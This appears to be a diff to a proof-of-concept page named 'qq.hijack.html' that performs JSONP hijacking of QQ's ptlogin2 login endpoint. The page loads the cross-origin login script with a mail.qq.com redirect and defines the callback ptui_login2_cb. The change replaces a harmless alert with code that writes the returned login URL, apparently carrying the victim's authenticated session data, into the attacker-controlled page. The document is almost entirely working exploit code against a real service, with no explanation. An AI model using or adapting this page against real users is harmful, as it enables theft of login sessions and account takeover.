--- a/qq.hijack.html
+++ b/qq.hijack.html
@@ -1,11 +1,11 @@
 <html>
   <body>
   <script type="text/javascript">
-  function ptui_login2_cb(){
-    alert(2)
+  function ptui_login2_cb(a,b){
+    document.getElementById('url').innerHTML = b;
   }
   </script>
-  
+  <div id='url'></div>
   <script src='http://ui.ptlogin2.qq.com/cgi-bin/login2?isdiv=1&appid=522005705&s_url=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dptlogin%26ss%3D&daid=4'></script>
   </body>
 </html>
